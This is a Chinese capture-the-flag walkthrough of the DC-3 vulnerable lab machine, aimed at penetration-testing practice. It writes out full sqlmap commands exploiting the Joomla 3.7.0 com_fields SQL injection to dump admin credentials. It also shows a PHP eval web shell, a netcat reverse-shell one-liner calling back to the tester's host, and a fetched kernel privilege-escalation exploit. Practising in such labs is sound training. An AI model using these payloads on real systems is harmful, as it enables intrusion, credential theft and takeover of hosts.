DC-3

DC系列是专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验，目前总共有9个靶机
关注微信公众号：网络安全101，公众号内回复**DC**，即可获取DC系列靶机镜像！

导入DC3靶机，网络适配器选择NAT模式，确保和kali处于同一IP段！！！

## 信息收集

> 确定目标主机IP地址

```
netdiscover -i eth0 -r 192.168.84.0/24
```

![image-20221215091208822](https://oss.maolin101.com/20250107035102085.png-101.webp)

> 扫描IP开放端口

```
masscan 192.168.84.178 --rate=10000 --ports 0-65535
```

![image-20221215091428710](https://oss.maolin101.com/20250107035102086.png-101.webp)

> 使用浏览器访问80端口

![image-20221215091631959](https://oss.maolin101.com/20250107035102087.png-101.webp)

> 通过插件获取到相关信息

![image-20221215091741977](https://oss.maolin101.com/20250107035102088.png-101.webp)

该网站由joomlaCMS搭建

> 利用joomscan工具进行扫描

```
joomscan -h
```

![image-20221215091937759](https://oss.maolin101.com/20250107035102089.png-101.webp)

扫描该网站

```
joomscan -u http://192.168.84.178/
```

![image-20221215092237913](https://oss.maolin101.com/20250107035102090.png-101.webp)

获取到相关版本号和路径

> 查找是否有历史漏洞

```
searchsploit Joomla 3.7.0
searchsploit -m 42033.txt    // m 为下载到当前路径
```

![image-20221215092613823](https://oss.maolin101.com/20250107035102091.png-101.webp)

> 查看42033.txt

![image-20221215092754118](https://oss.maolin101.com/20250107035102092.png-101.webp)

得到payload

```
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```

只需将localhost替换为目标地址即可

```
sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```

## web测试

> sqlmap

库名

```
sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 
```

![image-20221215093108603](https://oss.maolin101.com/20250107035102093.png-101.webp)

表名

```
sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  -D joomladb --tables
```

![image-20221215093217068](https://oss.maolin101.com/20250107035102094.png-101.webp)

字段名

```
sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  -D joomladb -T "#__users" --columns
```

![image-20221215093541736](https://oss.maolin101.com/20250107035102095.png-101.webp)

获取username、password字段数据

```
sqlmap -u "http://192.168.84.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]  -D joomladb -T "#__users" -C username,password --dump
```

![image-20221215093621602](https://oss.maolin101.com/20250107035102096.png-101.webp)

> 对password进行解密

![image-20221215094143643](https://oss.maolin101.com/20250107035102097.png-101.webp)

得到user的账户名与密码为admin、snoopy

> 网站后台进行登录

![image-20221215094235944](https://oss.maolin101.com/20250107035102098.png-101.webp)

> 存在网站模板

![image-20221215094718439](https://oss.maolin101.com/20250107035102099.png-101.webp)

> 可以新建文件 - new file

在html目录下新建shell.php文件

![image-20221215095146997](https://oss.maolin101.com/20250107035102100.png-101.webp)

写入内容

```
<?php eval($_REQUEST[1])?>
```

点击save进行保存

> 目录泄露

![image-20221215095650854](https://oss.maolin101.com/20250107035102101.png-101.webp)

> 访问shell.php 并传参

![image-20221215095726679](https://oss.maolin101.com/20250107035102102.png-101.webp)

> 蚁剑连接

```
http://192.168.84.178/templates/beez3/html/shell.php?1=phpinfo();
```

![image-20221215114936892](https://oss.maolin101.com/20250107035102103.png-101.webp)

## 提权

提权分为系统提权和应用提权

本次用的是系统提权

> 查看当前系统发行版本

```
cat /etc/*release
```

![image-20221215133559532](https://oss.maolin101.com/20250107035102104.png-101.webp)

> 搜索历史漏洞

```
searchsploit ubuntu 16.04
```

![image-20221215162333373](https://oss.maolin101.com/20250107035102105.png-101.webp)

```
searchsploit -m 39772
```

将对应的文档下载到当前目录

```
cat 39772.txt
```

![image-20221215162510733](https://oss.maolin101.com/20250107035102106.png-101.webp)

点击连接进行下载

![image-20221215162421529](https://oss.maolin101.com/20250107035102107.png-101.webp)

> 写入反弹shell

将shell.php中的一句话木马修改为反弹shell的木马

![image-20221215162748589](https://oss.maolin101.com/20250107035102108.png-101.webp)

```php
<?php 
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.84.174 10086 >/tmp/f');
?> 
```

本地开启监听端口

```
nc -lvnp 10086
```

浏览器访问shell.php文件

```
http://192.168.84.179/templates/beez3/html/shell.php
```

![image-20221215162947048](https://oss.maolin101.com/20250107035102109.png-101.webp)

> 靶机传送文件

由于在同一网络环境下， 开启http服务，用于传输文件

![image-20221215163053102](https://oss.maolin101.com/20250107035102110.png-101.webp)

![image-20221215163101275](https://oss.maolin101.com/20250107035102111.png-101.webp)

靶机中用wget进行下载文件

![image-20221215163141685](https://oss.maolin101.com/20250107035102112.png-101.webp)

> 解压文件

```
unzip 33992.zip
```

![image-20221215163239961](https://oss.maolin101.com/20250107035102113.png-101.webp)

进入39772目录，解压exploit文件

![image-20221215163355348](https://oss.maolin101.com/20250107035102114.png-101.webp)

进入ebpf_mapfd_doubleput_exploit目标，编译运行

![image-20221215163539468](https://oss.maolin101.com/20250107035102115.png-101.webp)

拿到最终的flag

![image-20221215163604116](https://oss.maolin101.com/20250107035102116.png-101.webp)